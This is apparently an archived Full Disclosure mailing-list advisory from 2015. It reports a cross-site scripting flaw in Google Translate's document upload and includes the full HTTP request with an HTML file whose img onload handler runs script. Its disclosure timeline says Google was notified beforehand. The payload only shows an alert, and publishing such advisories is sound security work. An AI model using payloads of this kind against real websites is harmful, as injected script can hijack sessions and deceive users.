[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <CAEWuDG5GXvufvU7jX7izqPvi04rp4VGEnxTHGVmPE0VdxLq4jg@mail.gmail.com>
Date: Thu, 26 Nov 2015 09:00:16 +0100
From: Francisco Javier Santiago Vázquez
<franciscojaviersantiagovazquez@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Google Translator affected by Cross-Site Scripting
vulnerability
I. VULNERABILITY
-------------------------
Vulnerability Cross-Site Scripting Translator Google affected by Cross-Site
Scripting vulnerability (XSS)
Google assumes the vulnerability.
II. DESCRIPTION
-------------------------
- Firstly, go to https://translate.google.es/?hl=es website and click in
"Document Translate"
- Upload the proof of concept
- Finally, we can display the Cross-Site Scripting (XSS)
III. PROOF OF CONCEPT
-------------------------
POST /translate_f HTTP/1.1
Host: translate.googleusercontent.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:39.0) Gecko/20100101
Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://translate.google.es/?hl=es
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------147452561017500
Content-Length: 1095
-----------------------------147452561017500
Content-Disposition: form-data; name="sl"
en
-----------------------------147452561017500
Content-Disposition: form-data; name="tl"
es
-----------------------------147452561017500
Content-Disposition: form-data; name="js"
y
-----------------------------147452561017500
Content-Disposition: form-data; name="prev"
_t
-----------------------------147452561017500
Content-Disposition: form-data; name="hl"
es
-----------------------------147452561017500
Content-Disposition: form-data; name="ie"
UTF-8
-----------------------------147452561017500
Content-Disposition: form-data; name="text"
-----------------------------147452561017500
Content-Disposition: form-data; name="file"; filename="poc.html"
Content-Type: text/html
<img src="
http://www.imagenesderisa.com.mx/wp-content/uploads/2015/10/imagenes-de-risa-2.jpg"
onload="alert('XSS en Google AUDIT')"</img>
-----------------------------147452561017500
Content-Disposition: form-data; name="edit-text"
-----------------------------147452561017500--
IV. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the Google Translator.
VI. CREDITS
-------------------------
These vulnerabilities have been discovered by
Francisco Javier Santiago Vázquez (
https://es.linkedin.com/in/francisco-javier-santiago-v%C3%A1zquez-1b654050).
(https://twitter.com/n0ipr0cs).
VII. DISCLOSURE TIMELINE
-------------------------
Nov 02, 2015: Vulnerability acquired by Francisco Javier Santiago
Vázquez. aka "n0ipr0cs"
Nov 03, 2015 Responsible disclosure to Google Security Team.
Nov 03, 2015 Google assumes the vulnerability
Nov 26, 2015 Disclosure
VIII. Links
------------------------
POC :-
http://www.estacion-informatica.com/2015/11/el-no-cross-site-scripting-de-google.html
*Francisco Javier Santiago Vázquez Ethical Hacker and Forensic Analyst
<http://www.linkedin.com/pub/francisco-javier-santiago-v%C3%A1zquez/50/540/1b6>
<http://estacioninformatica.blogspot.com.es/>
<https://twitter.com/n0ipr0cs>*
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists